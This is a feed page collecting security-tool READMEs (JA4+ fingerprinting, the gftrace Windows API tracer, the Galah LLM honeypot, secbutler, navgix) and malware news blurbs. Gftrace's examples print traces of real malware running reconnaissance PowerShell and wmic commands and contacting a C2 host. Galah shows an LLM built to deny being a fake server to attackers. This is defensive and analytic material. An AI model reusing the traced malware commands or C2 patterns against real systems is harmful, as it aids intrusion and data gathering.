FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

JA4+ - Suite Of Network Fingerprinting Standards

By: Zion3R


JA4+ is a suite of network FingerprintingΒ methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)


To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
fastly
with more to be announced...

Examples

Application JA4+ Fingerprints
Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
JA4S=t120300_c030_5e2616a54c73
Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
JA4S=t130200_1301_a56c5b993250
JA4X=000000000000_4f24da86fad6_bf0f0589fc03
JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
JA4X=2166164053c1_2166164053c1_30d204a01551
SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
JA4S=t130200_1302_a56c5b993250
JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
Qakbot JA4X=2bab15409345_af684594efb4_000000000000
Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
Darkgate JA4H=po10nn060000_cdb958d032b0
LummaC2 JA4H=po11nn050000_d253db9d024b
Evilginx JA4=t13d191000_9dc949149365_e7c285222651
Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

Plugins

Wireshark
Zeek
Arkime

Binaries

Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

Download the latest JA4 binaries from: Releases.

JA4+ on Ubuntu

sudo apt install tshark
./ja4 [options] [pcap]

JA4+ on Mac

1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]

JA4+ on Windows

1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate the ja4 folder

ja4 [options] [pcap]

Database

An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

In the meantime, see ja4plus-mapping.csv

Feel free to do a pull request with any JA4+ data you find.

JA4+ Details

JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

Current methods and implementation details:
| Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

To understand how to read JA4+ fingerprints, see Technical Details

Licensing

JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO

JA4+ can and is being implemented into open source tools, see the License FAQ for details.

This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

Q&A

Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

JA4+ was created by:

John Althouse, with feedback from:

Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

Contact John Althouse at john@foxio.io for licensing and questions.

Copyright (c) 2024, FoxIO



Malicious Python Package Hides Sliver C2 Framework in Fake Requests Library Logo

Cybersecurity researchers have identified a malicious Python package that purports to be an offshoot of the popular requests library and has been found concealing a Golang-version of the Sliver command-and-control (C2) framework within a PNG image of the project's logo.  The package employing this steganographic trickery is requests-darwin-lite, which has been

North Korean Hackers Deploy New Golang Malware 'Durian' Against Crypto Firms

The North Korean threat actor tracked as Kimsuky has been observed deploying a previously undocumented Golang-based malware dubbed Durian as part of highly-targeted cyber attacks aimed at two South Korean cryptocurrency firms. "Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads, and exfiltration of files,"

Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

By: Zion3R


A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!


How it works?

Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter which is pointer to something similar to the following structure:

struct LIBCALL {
DWORD_PTR Addr;
DWORD Argc;
DWORD_PTR Argv;
DWORD_PTR ReturnValue;

[...]
}

Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.

Installation

Download the latest release.

Usage

  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>

Configuration

All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:

CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.

The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.

Examples

Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

[...]

Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

[...]

Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )

[...]

Future features:

  • [x] Support inspection of 32 bits files.
  • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
  • [x] Add support to cmdline parameters for the target process
  • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

:warning: Warning

  • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.

License

The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



Hackers Target Middle East Governments with Evasive "CR4T" Backdoor

Government entities in the Middle East have&nbsp;been targeted&nbsp;as part of a previously undocumented campaign to deliver a new backdoor dubbed CR4T. Russian cybersecurity company Kaspersky said it discovered the activity in February 2024,&nbsp;with evidence suggesting&nbsp;that it may have been active&nbsp;since&nbsp;at least a year prior.&nbsp;The campaign has&nbsp;been codenamed&nbsp;

Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme

A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems. "The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice," Trustwave SpiderLabs researcher Karla Agregado&nbsp;said. The email message, the company said, originates from an email

Malicious Apps Caught Secretly Turning Android Phones into Proxies for Cybercriminals

Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store. The findings come from HUMAN's Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user's device into a proxy node without their knowledge.

Malicious Ads Targeting Chinese Users with Fake Notepad++ and VNote Installers

Chinese users looking for legitimate software such as Notepad++ and VNote on search engines like Baidu are being targeted with malicious ads and bogus links to distribute trojanized versions of the software and ultimately deploy&nbsp;Geacon, a Golang-based implementation of Cobalt Strike. β€œThe malicious site found in the notepad++ search is distributed through an advertisement block,” Kaspersky

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



Kimsuky's New Golang Stealer 'Troll' and 'GoBear' Backdoor Target South Korea

The North Korea-linked nation-state actor known as Kimsuky is suspected of using a previously undocumented Golang-based information stealer called&nbsp;Troll Stealer. The malware steals "SSH, FileZilla, C drive files/directories, browsers, system information, [and] screen captures" from infected systems, South Korean cybersecurity company S2W&nbsp;said&nbsp;in a new technical report. Troll

Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

Heuristics

